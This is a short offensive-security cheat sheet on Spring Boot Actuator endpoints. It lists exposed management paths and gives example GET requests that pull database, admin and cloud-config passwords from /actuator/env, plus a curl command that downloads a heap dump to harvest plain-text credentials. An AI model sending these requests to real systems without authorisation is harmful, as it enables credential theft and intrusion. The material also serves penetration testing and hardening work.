Page cover

Spring-Boot

Open-source Java framework used for Spring-based applications

Read this article from Wiz

Actuators

Actuators are management endpoints, those are the most important for you:

/actuator/health and /actuator/info are public available

  • /dump or /threaddump - Exposes data in memory.

  • /trace or /httptrace - Shows recent HTTP requests.

  • /logfile - Exposes application log files.

  • /env or /actuator/env - Reveals environment variables, configuration properties, and system settings.

  • /mappings - Shows all URL mappings and endpoints.

  • /heapdump - Downloads a heap dump file containing all objects in memory.

  • /shutdown - Allows remote shutdown of the application

  • /restart - Allows remote restart of the application

SecLists has a great wordlist: Javascript-Spring-Boot

Querying tricks

Using Property Patterns

When you see patterns like:
spring.datasource.url
spring.datasource.username
spring.datasource.password
  • You can use these patterns in two ways:

Direct Access
/actuator/env/spring.datasource.password
Prefix Queries
/actuator/configprops/spring.datasource

Environment Variable

Spring Boot automatically maps environment variables to its property format following these rules:

  • Uppercase letters

  • Replace dots with underscores

  • Replace hyphens with underscores

  • Remove special characters

You can query these directly:
/actuator/env/SPRING_DATASOURCE_PASSWORD
Enumeration

Configuration Discovery with /actuator/env

Look for interesting patterns:

  • Database properties (spring.datasource.*)

  • Security properties (spring.security.*)

  • Cloud properties (spring.cloud.*)

Try prefix queries to see related properties:
GET /actuator/configprops/spring.datasource
Finding Database Credentials
GET /actuator/env/spring.datasource.url
GET /actuator/env/spring.datasource.username
GET /actuator/env/spring.datasource.password
Finding Custom Application Properties
GET /actuator/env/app.admin.username
GET /actuator/env/app.admin.password
If the application uses Spring Cloud, look for:
"spring.cloud.config.uri"
"spring.cloud.config.username"
"spring.cloud.config.password"

Try Different content types

application/vnd.spring-boot.actuator.v3+json
application/json 
CVE-2025-48927 - /heapdump exposed - Initialization of a Resource with an Insecure Default
Download a ~150MB file containing plain-text usernames and passwords and much more :)
curl -X GET http://IP/actuator/heapdump

Use VisualVM took at the files from the dump comfortably

Last updated